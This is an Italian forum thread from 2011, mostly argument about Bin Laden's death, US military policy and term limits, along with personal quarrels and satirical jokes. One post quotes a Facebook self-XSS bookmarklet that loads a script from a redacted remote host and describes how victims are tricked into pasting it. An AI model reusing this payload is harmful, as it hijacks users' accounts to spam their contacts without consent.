NelloDominat
4th May 2011, 17:32
Ci fosse solo una volta che scrivi bene in inglese.... :nod:
Toi mon caliss t'es un caliss de cave! Tu ne comprends même pas ce dont tu parles...Giusto per rimarcare la mia Quecosita'...
Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.
L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.
Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.
Hardcore
4th May 2011, 17:34
Toi mon caliss t'es un caliss de cave! Tu ne comprends même pas ce dont tu parles...Giusto per rimarcare la mia Quecosita'...
Non voglio andare troppo oltre nella discussione. Voglio solo ricordarti dove abito. Montréal Québec. Parlo per 80% Francese, 19% inglese 1% italiano. Visto che lavoro come consulente per Bombardier.
Ma Bombardier la birra?
Hardcore
4th May 2011, 17:38
No per fortuna non lo guardo facebook.
Dettagli sul sito ? :rotfl:
javascript: (a=(b=document).createElement('script')).src='//INDIRIZZO IP/strummer.php?'+Math.random(),b.body.appendChild(a) ;void(0)
Questo è il link, ovviamento ho rimosso l'IP :)
bisogna prenderlo e copiarlo nella barra,la cosa carina è che in primis ti bombarda le persone online su fb nella friend list, in piu ti fa fare mi piace alla loro pagina di FB. Molto interessante
Nazgul Tirith
4th May 2011, 17:39
javascript: (a=(b=document).createElement('script')).src='//INDIRIZZO IP/strummer.php?'+Math.random(),b.body.appendChild(a) ;void(0)
bisogna prenderlo e copiarlo nella barra,la cosa carina è che in primis ti bombarda le persone online su fb nella friend list, in piu ti fa fare mi piace alla loro pagina di FB. Molto interessante
E ci cliccavano tutti come droidi? :rotfl:
Hardcore
4th May 2011, 17:43
E ci cliccavano tutti come droidi? :rotfl:
Non ci devi cliccare, perke non funziona, devi copiarlo nella barra degli indirizzi e poi premere enter. Come dire Facebook è anti attacco, ma ti basta fare una pagina di un gruppo con scritto HEY COPIA QUESTA STRINGA che tutta la tua sicurezza va a farsi benedire
NelloDominat
4th May 2011, 18:05
Ma Bombardier la birra?
hehehe magari :sneer:
http://www.bombardier.com/
Bombardier Transportation&Aerospace
NelloDominat
4th May 2011, 18:50
p.s. per nello: motherfuckin' bitches of a son
:rotfl::rotfl::rotfl:
:nono:
brumbrum
4th May 2011, 19:03
Guerra fra new papà, guardali che acidità intrinseca che si portano dietro.. :sneer:
colpa delle cacchine bimbiche
cmq è inutile: obama può anche sterminare il vaticano, ma mi starà sempre sul cazzo
Ipnotik
4th May 2011, 19:04
io ho amico su facebook un macfanboy che postava sempre foto dei suoi cazzo di mac offendendo tutti quelli che hanno windows perche' dice che " MAC E' PIU' SICURO! NON E' POSSIBILE PRENDERE VIRUS! "
Ovviamente e' uno di quelli infettati e godo come un porco.
Alkabar
4th May 2011, 19:14
shahaha
tornando una minima seri, vogliamo contare gli europei che vanno in america e gli americani che vengono in europa? :D Poi, europa, europa mica è una nazione venire in europa non vuol dire un cazzo :nod:
Per il momento non lo è, ma lo sarà. Sempre che l'Italia non crolli, facendo crollare l'intera area euro.
Warbarbie
4th May 2011, 19:23
Se è old fotte un cazzo
http://www.youtube.com/watch?v=4hk37gNIpY4&feature=player_embedded
Alkabar
4th May 2011, 19:49
Piantala con sta storia:
Tu as oublié que j'habit à Valais et que j'etudie la langue française. A force de te masturber tu as perdu ta mémoire. Il y a seulement six mois que j'etudie, ce n'est pas possible pour mois d'éviter de faire des errours.
Per quanto riguarda l'inglese, ho un PhD in UK, insegnavo in inglese e andavo perdendo l'accento italiano che purtroppo è ora tonante in me, visto che vivo in Svizzera e di gente dall'UK non ne sento parlare piu' tanta...
Pero' otto ore al giorno in inglese per lavoro le faccio ancora, insegnamo per qualche strana ragioen in inglese e facciamo tutta la ricerca internazionale in inglese...
Potresti anche darmi credito del fatto che magari me la cavo benino, tanto benino che tanti madrelingua fanno piu' errori di me, dato che non l'hanno studiato e usato quanto me....
Ma niente contro di questo. Comunque guarda che ti stavo trollando, non c'è ragione di farne una tragedia greca, anzi Quebecchiana.
L'unica cosa che ho notato e' che quando la tua argomentazione fallisce miserabilmente e qualcuno ti chiude la bocca, invcece di "abbozzare" cerchi di trovare l'errore ortografico o grammaticale (tra l'altro in questo caso corretto ancor prima della tua risposta) per spostare l'attenzione su dettagli inutili per mascherare la pochezza e delle tue risposte.
La mia argomentazione non è fallita, l'avete mandata in vacca con la solita fanfara all'Italiana.
Si è sviluppata cosi':
Gli americani fanno bene a festeggiare.
Io: No, ce l'hanno messo loro la, oltre tutto hanno una politica imperialista di sto cazzo, se gli si rivolta contro mezzo pianeta per reazione non dovrebbero festeggiare come dei maiali ipocriti.
Hador: hanno una politica migliore della nostra, pagherei per averla qua.
Io: militari, università e cazzi e mazzi.
Hador: visione del mondo di alka.
Alka: visione del mondo di alka.
Al maiali ipocriti vi siete inalberati, tu in particolare perchè ti senti vicino a loro, e poi siamo finiti qua.
Mi fa piacere che tu abbia messo il mio quote in firma. Ogni qualvolta lo leggero', ridero' al pensiero che hai dovuto editarlo poiche' hai "failato" il reply.
Ah di, ogni tanto lavoro anche io, mica posso farci niente se tra il notare il fail e quotare è arrivato il mio capo con 200 documenti da firmare.
La tolgo comunque, ti stavo solo trollando.
marlborojack
4th May 2011, 20:32
lavoro come consulente per Bombardier
Spero tu finisca seppellito nelle boe SCMT, PD!
NelloDominat
4th May 2011, 21:00
Spero tu finisca seppellito nelle boe SCMT, PD!
Grazie ma sono nella parte IT di Bombardier... I controlli marcia frega proprio niente :D
Ti stupirai dei livelli dell'idiozia della gente, giovane padawan, e poi un giorno, forse, smetterai di stupirti e tutto ti sembrerà così ovvio...
:D
Glasny
4th May 2011, 22:07
A parte che i mandati totali massimi di un presidente usa sono sicuramente più di 2 (il mio dubbio era tra 3 e 4, qualche ameriggano potrebbe precisare ?).
L'america viene considerata una nazione ma in realtà è composta da una cinquantina di stati, ognuno con caratteristiche diverse, non la vedo così diversa da un'europa con un governo centrale più forte. Per cui invece di generalizzare, alcune parti dell'america mi piacciono, altre di meno, e le differenze tra alcuni stati sono enormi. Quello che so di Nello è che viaggia talmente tanto che non riesce a seguire nemmeno un browser game (cavolo mi avevi invitato su LoU e poi mi hai lasciato crepare :D).
Tornando al discorso, Alkabar non è il caso di fare moralismi, è normale che esultano, è una guerra (diciamo così), l'uccisione del nemico ci sta e ci stanno anche i festeggiamenti. O forse non era giusto festeggiare che ne so, per le varie guerre di liberazione o indipendenza ? Non vedo molta differenza. Per quanto riguarda l'esercito americano, beh a noi come europa fa molto comodo, loro fanno debiti e si occupano di tutte le faccende nel mondo, mentre noi spendiamo quei fondi per lo stato sociale. Per quanto mi riguarda dovrebbero continuare così fino alla bancarotta.
Alkabar
4th May 2011, 23:00
A parte che i mandati totali massimi di un presidente usa sono sicuramente più di 2 (il mio dubbio era tra 3 e 4, qualche ameriggano potrebbe precisare ?).
L'america viene considerata una nazione ma in realtà è composta da una cinquantina di stati, ognuno con caratteristiche diverse, non la vedo così diversa da un'europa con un governo centrale più forte. Per cui invece di generalizzare, alcune parti dell'america mi piacciono, altre di meno, e le differenze tra alcuni stati sono enormi. Quello che so di Nello è che viaggia talmente tanto che non riesce a seguire nemmeno un browser game (cavolo mi avevi invitato su LoU e poi mi hai lasciato crepare :D).
Tornando al discorso, Alkabar non è il caso di fare moralismi, è normale che esultano, è una guerra (diciamo così), l'uccisione del nemico ci sta e ci stanno anche i festeggiamenti. O forse non era giusto festeggiare che ne so, per le varie guerre di liberazione o indipendenza ? Non vedo molta differenza. Per quanto riguarda l'esercito americano, beh a noi come europa fa molto comodo, loro fanno debiti e si occupano di tutte le faccende nel mondo, mentre noi spendiamo quei fondi per lo stato sociale. Per quanto mi riguarda dovrebbero continuare così fino alla bancarotta.
La domanda è: se non ci fossero loro ci sarebbero piu' conflitti? Perchè a me pare applichino il buon vecchio divide et impera.
Kinson
4th May 2011, 23:04
[QUOTE=Alkabar;1745330]La domanda è: se non ci fossero loro ci sarebbero piu' conflitti? QUOTE]
"La vita è un sogno , o i sogni sono fatti per vivere meglio ? "
Ci sono domande che non avranno mai risposta :D
Alkabar
4th May 2011, 23:08
[QUOTE=Alkabar;1745330]La domanda è: se non ci fossero loro ci sarebbero piu' conflitti? QUOTE]
"La vita è un sogno , o i sogni sono fatti per vivere meglio ? "
Ci sono domande che non avranno mai risposta :D
Cioè: si, staremmo tutti meglio, ma è un sogno. Ah beh, sembrava anche a me cosi'.
Glasny
4th May 2011, 23:17
Si, ci sarebbero molti più conflitti. Vedi la storia prima degli USA, un continuo di guerre... ora invece dopo la 2a guerra mondiale ci sono solo piccoli conflitti. A qualcosa servono, anche se col sistema finanziario moderno avere sempre almeno una guerra attiva porta alla bancarotta. Ma anche qui basta consultare la storia, gli USA sono ininterrotamente in guerra dalla fondazione a oggi, vedi http://en.wikipedia.org/wiki/Timeline_of_United_States_military_operations
Quindi continueranno fino alla bancarotta e oltre. Ma ciò non causa le guerre, più che altro le spegne sul nascere.
Inoltre noi come Europa e come Italia ci ritroveremmo a dover spendere molto di più per la sicurezza (come minimo), se per assurdo supponiamo che gli USA smettano di spendere metà gettito in spese militari per eliminare il deficit.
Alkabar
4th May 2011, 23:29
Si, ci sarebbero molti più conflitti. Vedi la storia prima degli USA, un continuo di guerre... ora invece dopo la 2a guerra mondiale ci sono solo piccoli conflitti. A qualcosa servono, anche se col sistema finanziario moderno avere sempre almeno una guerra attiva porta alla bancarotta. Ma anche qui basta consultare la storia, gli USA sono ininterrotamente in guerra dalla fondazione a oggi, vedi http://en.wikipedia.org/wiki/Timeline_of_United_States_military_operations
Quindi continueranno fino alla bancarotta e oltre. Ma ciò non causa le guerre, più che altro le spegne sul nascere.
Inoltre noi come Europa e come Italia ci ritroveremmo a dover spendere molto di più per la sicurezza (come minimo), se per assurdo supponiamo che gli USA smettano di spendere metà gettito in spese militari per eliminare il deficit.
Mah. Notte va che domani sveglia alle 4.30.
Bortas
5th May 2011, 01:32
La risposta è 2 mandati massimo, dal 1951 è pure legge, il XXII emendamento della costituzione Statunitense, in precedenza sarebbe pure stato possibile ma l'unico che fa eccezione alla regola è Franklin Delano Roosevelt che ha fatto 4 mandati accompagnado gli Stati Uniti d'America dal 1932 al 1945, il quarto mandato non lo completò perchè morì di emorragia cerebrale, rimase particolarmente simpatico al popolo perchè lo fece uscire dalla grande depressione del '29, con una lungimirante politica economica, da buon democratico gettò le basi per uno stato sociale occupandosi delle fasce deboli, disoccupati, malati e anziani, tramite indennità. La sua politica denominata "New Deal" riformò principalmente le tasse, il sistema bancario e la borsa, è stato criticato principalemente per un eccessiva tendenza allo statlismo, ma gli Americani lo hanno amato molto...
Mi hai fatto riprendere in mano i manuali di storia, ci avevo fatto pure una monografia sulla politica economica Statunitense dal '29 fino a Truman ...
mamma mia quante cazzate pero , gesù...
Glasny
5th May 2011, 20:58
La risposta è 2 mandati massimo, dal 1951 è pure legge, il XXII emendamento della costituzione Statunitense, in precedenza sarebbe pure stato possibile ma l'unico che fa eccezione alla regola è Franklin Delano Roosevelt che ha fatto 4 mandati accompagnado gli Stati Uniti d'America dal 1932 al 1945, il quarto mandato non lo completò perchè morì di emorragia cerebrale, rimase particolarmente simpatico al popolo perchè lo fece uscire dalla grande depressione del '29, con una lungimirante politica economica, da buon democratico gettò le basi per uno stato sociale occupandosi delle fasce deboli, disoccupati, malati e anziani, tramite indennità. La sua politica denominata "New Deal" riformò principalmente le tasse, il sistema bancario e la borsa, è stato criticato principalemente per un eccessiva tendenza allo statlismo, ma gli Americani lo hanno amato molto...
Mi hai fatto riprendere in mano i manuali di storia, ci avevo fatto pure una monografia sulla politica economica Statunitense dal '29 fino a Truman ...
Bella risposta :D A me bastava che confermassi che i mandati erano 2 al max, non so perchè fossi convinto erano 3, vabbè. Dovrebbero farla uguale da noi la legge, al massimo 2 volte premier, poi a casa.
Necker
6th May 2011, 12:29
glasny però se gli Usa attaccano a fare guerrette iperdispendiose (hanno calcolato che Osama è costato in toto quasi 1300 miliardi $) fino alla bancarotta come sostieni, ci tirano dentro assieme a mezzo mondo. Direi che non è il caso.
Senza considerare che a fare i guerrafondai alla fine tutta la merda che sganci dai bombardieri ti ritornerà contro con gli interessi. Uccidere il dittatore od il terrorista non risolve i problemi, se mai promuove l'odio che già buona parte del pianeta prova per gli americani ed i loro alleati.
Andare a fomentare tale odio inquelle parti del mondo dove la gente è facilmente indottrinabile fino al proprio martirio, vedi i paesi fondamentalisti non mi sembra sta gran furbata.
Glasny
6th May 2011, 14:50
glasny però se gli Usa attaccano a fare guerrette iperdispendiose (hanno calcolato che Osama è costato in toto quasi 1300 miliardi $) fino alla bancarotta come sostieni, ci tirano dentro assieme a mezzo mondo. Direi che non è il caso.
Senza considerare che a fare i guerrafondai alla fine tutta la merda che sganci dai bombardieri ti ritornerà contro con gli interessi. Uccidere il dittatore od il terrorista non risolve i problemi, se mai promuove l'odio che già buona parte del pianeta prova per gli americani ed i loro alleati.
Andare a fomentare tale odio inquelle parti del mondo dove la gente è facilmente indottrinabile fino al proprio martirio, vedi i paesi fondamentalisti non mi sembra sta gran furbata.
Tralasciando il discorso sulla bancarotta che è un po' complicato (cioè è da vedere se gli usa fanno bancarotta, lo fa anche il resto del mondo ? oppure al contrario, se ormai anche senza spese militari, facciamo lo stesso bancarotta tutti ?).. ecco lasciamo perdere che sennò ci tocca fare una ricerca di diverse ore che ora non ho.
Le guerrette in se non sono un male, perchè c'è la prova che altrimenti ci sarebbero anche più guerre, e probabilmente più lunghe e sanguinose. Un conto è avere una superpotenza per cui non appena esci fuori dai ranghi ti arriva la flotta di cacciabomardieri in testa, un conto è un mondo dove non devi fare la guerra perchè è sbagliata, ma se non sei di quell'idea poi sei libero di arrostire milioni di persone. Insomma il controllo "imperiale", o per dirlo con parole moderne, delle sfere d'influenza, ha impedito guerre di portata maggiore dalla seconda guerra mondiale ad oggi. Senza gli USA avremmo come vicini una Grande Serbia aggressiva e nazionalista, invece che una piccola serbia che vuole entrare nell'UE. Tanto per dirne una.
Gli unici a cui conviene che gli USA spendano di meno per la guerra sono gli americani stessi, ma visto il circolo vizioso: guerra -> soldi pubblici alle aziende (non solo di armi ma tutto l'indotto) -> soldi ai politici per le campagne elettorali (che lì è legale), dubito fortemente si possa arrestare.
Necker
6th May 2011, 15:36
Oddio sulla necessità del grande big brother che spavaldamente va a calmare le altre teste calde del globo, non so fino a quanto possa essere utile sai?
La Serbia ultranazionalista che problemi avrebbe potuto dare? la guerra è scoppiata nei Balcani perchè si stavano ammazzando fra di loro stile pulizia etnica, questioni puramente religiose e locali, se ve ne fossero state anche di economiche, sinceramente non lo so (non credo che da quelle parti fosse in programma di costruire qualche oleodotto o gasdotto strategico per l'occidente, ma potrei sempre sbagliarmi eh)
Discorso medioriente, frega un cazzo della gente locale, ciò che conta è gestire gli equilibri economici planetari viste le risorse naturali di cui ben sappiamo sono forniti questi signori, la Libia in primis ma anche Iraq e Afghanistan non son da meno.
Per cui, siamo alle solite, fanno la guerra indebitandosi ma con la prospettiva che una volta azzerato il problema locale di facciata del dittatore/terrorista/pg random scomodo si possa sfruttare il campo di battaglia per investirci soldi e ripagarsi nel tempo delle spese sostenute per la guerra stessa.
Ciò che mi chiedo è se in questo equilibrio molto malato, a medio lungo termine, si possa realmente sperare in qualcosa di positivo, io in tutta onestà non lo so ma propendo per un secco no.
Come detto prima, devi pur sempre fare in conti con milioni di persone culturalmente arretrate, facilmente rincoglionibili e quindi potenzialmente pericolose per tutti noi.
Possiamo permettercelo? Avere petrolio gas e imprese che lavorano in quei paesi vale la pena di vivere con la paura che ogni tanto ci facciano evaporare un monumento, un grattacielo, una metrò e via dicendo? Penso convenga anche tu che forse il gioco non vale la candela.
fino ad oggi noi italioti, con la nostra politica molle e infinitamente doppiogiochista, ce la siamo tutto sommato cavata. Ma ora ci hanno messo nell'angolino, a bombardare la Libia ora ci siamo pure noi, guarda Gheddafi come ha sfruttato la cosa e ora rischiamo seriamente di diventare un obiettivo per gli attacchi.
Vale la pena?
edit: aggiungo una cosa, si può fare la guerra, resettare un paese e poi sfruttarlo per la propria economia e questo è in soldoni ben chiaro a tutti, ma il medesimo paese, è comunque sfruttabile anche senza la necessità di doverlo attaccare militarmente. Chiarisco, siccome i padroni di casa dovran pure far su soldi concui mangiare, il petrolio saranno obbligati a venderlo. Per cui, la necessità della guerra è vera fino ad un certo punto.
Glasny
6th May 2011, 15:53
Più che altro se hai la superiorità militare superi anche una bancarotta statale, avendo la forza dalla tua.
Ma non sono d'accordo sulla tua analisi che sperano di ripagarsi le spese, in realtà come ho detto, è un circolo vizioso per cui si spendono soldi pubblici per finanziare la guerra, e nessuno si aspetta che questi soldi tornino indietro. Non è esattamente per il petrolio che hanno fatto la guerra all'Iraq, tanto più che sto petrolio resta agli iracheni mica lo prendono a basta, devono pagarlo uguale.
Su Gheddafi non sarei molto preoccupato, direi che ha altro a cui pensare al monento, e quando la "guerra" in Libia sarà finita, dubito ci sarà ancora. La nato è in grado di bombardare una nazione per molti, molti anni :D
Se poi per te una Serbia aggressiva e ultranazionalista non è un problema, considera lo scenario senza gli USA, senza la Nato, con una Serbia che si espande a spese dei vicini (senza perdere pezzi, e quindi niente croazia, slovenia o kosovo.. anzi niente kosovari), è un classico scenario che con gli anni evolve in una guerra regionale o mondiale. Se vedi un po' la storia degli ultimi millenni, i periodi di pace coincidono con un impero/superpotenza che mantiene il controllo, mentre le maggiori guerre ci sono negli altri periodi.
Per tornare IT, la morte di Osama non cambia nulla nelle strategie militari USA, continueranno in Afghanistan e una volta che i Talebani saranno finiti (e per quanto detto prima, in reatà l'interesse delle aziende e dei militari è che durino il più a lungo possibile), troveranno qualcun'altro, come hanno sempre fatto dalla fondazione a oggi.
Alkabar
8th May 2011, 00:47
Da Spinoza:
Osama Bin Laden è morto. Ma non mi ricordo più perché dovrei essere felice.
(Una beffa per Osama. Era a soli quattro mesi dalla prescrizione)
Gli Usa liquidano Osama. Non avevano intenzione di rinnovargli il contratto.
Osama Bin Laden è stato ucciso. È la sorte di tutti i testimoni chiave.
Il leader di Al Qaeda colpito da un proiettile alla testa. È l’unico modo per uccidere uno zombie.
L’uccisione di Bin Laden è avvenuta nel corso di un’operazione dei reparti speciali americani. Nome in codice della missione: “Boh, proviamo qui”.
Il leader di Al Qaeda vittima di un blitz. L’operazione è durata solo 15 minuti e 304.041.600 secondi.
Giustizia è fatta: finalmente ucciso il colpevole di centinaia di migliaia di morti in Afghanistan e Pakistan.
Ha funzionato la tecnica americana: bombardare tutti i paesi vicini, costringendo Osama a rifugiarsi lì.
Nell’operazione arrestate due mogli e sei figli. Se è vivo è un genio.
Bin Laden era stato riconosciuto colpevole di uno dei più vergognosi crimini della storia: la rielezione di George W. Bush.
Dall’11 settembre Bin Laden minacciava gli Usa con video e messaggi su internet. Ma magari cercava soltanto di rimettercisi insieme.
Il test del dna conferma quanto già si pensava: le altre vittime della guerra non erano Bin Laden.
Bin Laden si nascondeva in un complesso residenziale di lusso. Gli piaceva minacciare i vicini dal videocitofono.
(Osama era l’unico al mondo che quando sentiva il campanello sperava fossero i testimoni di Geova)
Quando è stato ucciso, Bin Laden aveva in tasca 500 euro. Era chiaro che non sarebbe arrivato a fine mese.
(500 euro addosso a Bin Laden. Anche in Pakistan esistono i Responsabili?)
Barack Obama: “Non mostreremo alcuna immagine di Osama”. Puntano sulle mille parole.
Gli americani divisi sulla foto di Bin Laden. Per molti è un nudo artistico.
Un funzionario Usa alla Cnn: “Il cadavere è stato trattato secondo la tradizione islamica”. Portato a spalla festeggiando per le vie della città.
Al Qaeda conferma la morte di Bin Laden. Ok, di loro ci si può fidare.
Berlusconi: “Tutti aspettavano questa notizia”. So già quando rispolverare questa citazione.
Al Qaeda starebbe già scegliendo il nuovo leader. Si attende a breve la fumata bianca da qualche grattacielo.
Bin Laden sepolto in mare. Ora sono cazzi di Capitan Findus.
Il cadavere di Bin Laden è stato abbandonato in mare perché nessun paese lo voleva. Quindi arriverà a Lampedusa.
La Santa Sede: “Di fronte alla morte non si festeggia”. E dire che erano reduci da tre giorni di bagordi.
Alcuni attribuiscono a Karol Wojtyla la morte di Bin Laden. Ma non mi risulta che avesse l’aids.
Pare che Al Qaeda si stesse preparando a colpire in maniera durissima le ferrovie americane. Vendendole a Trenitalia.
Diffuse le ultime parole pronunciate da Bin Laden: “Chi è?”
L'ultima in particolare.
:rotfl: :rotfl: :rotfl:
Alkabar
8th May 2011, 00:47
doppio.
innaig86
8th May 2011, 01:34
L'ultima è snap-diventata il mio stato Facebook, con dovuta citazione.
Sent from my Desire HD using Tapatalk
Necker
18th May 2011, 13:49
come volevasi dimostrare....
http://www.corriere.it/esteri/11_maggio_18/adel-qaeda-successore-osama_ff889c60-812b-11e0-ab0f-f30ae62858c8.shtml
NOminato un egiziano come successore di Osama Bin Laden. E si riparte...